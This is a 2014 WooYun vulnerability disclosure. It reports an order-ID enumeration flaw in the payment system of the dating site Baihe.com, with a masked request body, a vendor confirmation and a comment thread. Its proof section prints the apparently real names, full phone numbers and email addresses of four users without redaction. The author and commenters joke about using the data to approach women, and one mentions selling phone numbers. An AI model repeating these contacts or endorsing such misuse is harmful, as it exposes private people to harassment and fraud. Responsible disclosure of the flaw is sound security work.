当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054592

漏洞标题:百合网注册信息泄漏之手机、邮箱、QQ

相关厂商:百合网

漏洞作者: sadn3s

提交时间:2014-03-26 10:38

修复时间:2014-05-10 10:39

公开时间:2014-05-10 10:39

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-26: 细节已通知厂商并且等待厂商处理中
2014-03-27: 厂商已经确认,细节仅向厂商公开
2014-04-06: 细节向核心白帽子及相关领域专家公开
2014-04-16: 细节向普通白帽子公开
2014-04-26: 细节向实习白帽子公开
2014-05-10: 细节向公众公开

简要描述:

百合网用户的注册信息一览无余,里面有手机,邮箱,QQ什么的都很全啊,这下找妹子可方便多了( ̄▽ ̄),下期预告《珍爱网注册信息泄漏之手机》

详细说明:

payment.baihe.com
POST数据里的orderid越权了,可以遍历
servicecode=&otherPayFlag=&oppId=null&oppUserName=null&payparams=&returnurl=&paycount=&userID=马赛克&orderid=马赛克&cookie_useremail=null&insignCode=pay_3&bankCode=马赛克&alipaySignFlag=null&orderSource=&focusstarparams=&price=&sign=

漏洞证明:

返回数据:
UID/姓名/手机号/城市代码/邮箱
69549833 罗先生 15951835706 863201 347756840@qq.com
59978727 邱女士 15228858678 865101 516580356@qq.com
77501855 蔡先生 13818143139 863109 cclinter@163.com
87828462 李先生 13934369314 861411 13934369314@mobile.baihe.com
...
管理员请打马赛克

修复方案:

版权声明:转载请注明来源 sadn3s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-03-27 18:06

厂商回复:

27号下午,我们已经开始修复此次用户敏感信息漏洞。感谢各位白帽子对百合网的关注。谢谢各位!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-26 11:38 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    mark

  2. 2014-03-26 12:01 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    楼主搞百合网处于处于扫描心态,呵呵

  3. 2014-03-26 12:12 | sadn3s ( 普通白帽子 | Rank:111 漏洞数:18 )

    @大大灰狼 你怎么知道,就是没扫到中意的妹子,有几个感觉像钓鱼的妹子,好险~

  4. 2014-03-26 14:07 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    又是系列

  5. 2014-03-26 16:37 | 五色花 ( 路人 | Rank:0 漏洞数:1 | jvav)

    顶你一个 ,,,,,

  6. 2014-03-26 16:50 | sadn3s ( 普通白帽子 | Rank:111 漏洞数:18 )

    @五色花 3q

  7. 2014-03-27 18:48 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    某威客网站上 一个电话1-300块钱 洞主 浪费发财机会了

  8. 2015-04-09 13:26 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    你知道如今找个媳妇多不容易,这么好的机会你居然不用!汗!!!